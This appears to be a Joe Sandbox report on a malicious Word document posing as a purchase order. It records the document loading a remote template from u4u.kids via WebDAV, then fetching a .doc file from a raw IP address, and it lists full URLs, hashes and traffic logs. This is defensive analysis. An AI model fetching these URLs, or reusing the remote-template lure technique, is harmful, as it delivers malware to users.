Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO NAHK22012FA000000.docx

Overview

General Information

Sample name:PO NAHK22012FA000000.docx
Analysis ID:1540372
MD5:48dd0e8d2647a5d093f64f186dcac877
SHA1:258650076b605d2d46984016ad2986e7e41b6b9e
SHA256:e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Microsoft Office launches external ms-search protocol handler (WebDAV)
Contains an external reference to another file
Office viewer loads remote template
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3312 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49164, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 24.199.88.84, SourceIsIpv6: false, SourcePort: 443
Sigma detected: Modification of IE Registry Settings
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Sigma detected: Office Macro File Creation
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: global trafficDNS query: name: u4u.kids
Source: global trafficDNS query: name: u4u.kids
Source: global trafficDNS query: name: u4u.kids
Source: global trafficDNS query: name: u4u.kids
Source: global trafficDNS query: name: u4u.kids
Source: global trafficDNS query: name: u4u.kids
Source: global trafficDNS query: name: u4u.kids
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global trafficTCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global trafficTCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global trafficTCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: Joe Sandbox ViewASN Name: TWC-12271-NYCUS TWC-12271-NYCUS
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknownTCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknownTCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknownTCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknownTCP traffic detected without corresponding DNS query: 62.151.179.85
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: u4u.kids
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:14 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal56.evad.winDOCX@1/16@7/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ NAHK22012FA000000.docxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR894B.tmpJump to behavior
Source: PO NAHK22012FA000000.docxOLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docxOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docxOLE document summary: title field not present or empty
Source: PO NAHK22012FA000000.docxOLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: PO NAHK22012FA000000.LNK.0.drLNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA000000.docx
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: PO NAHK22012FA000000.docxInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: PO NAHK22012FA000000.docxInitial sample: OLE zip file path = word/media/image3.emf
Source: PO NAHK22012FA000000.docxInitial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: PO NAHK22012FA000000.docxInitial sample: OLE zip file path = word/media/image2.emf
Source: PO NAHK22012FA000000.docxInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/media/image2.emf
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/media/image3.emf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: PO NAHK22012FA000000.docxInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Microsoft Office launches external ms-search protocol handler (WebDAV)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRootJump to behavior
Contains an external reference to another file
Source: settings.xml.relsExtracted files from sample: https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament
Office viewer loads remote template
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
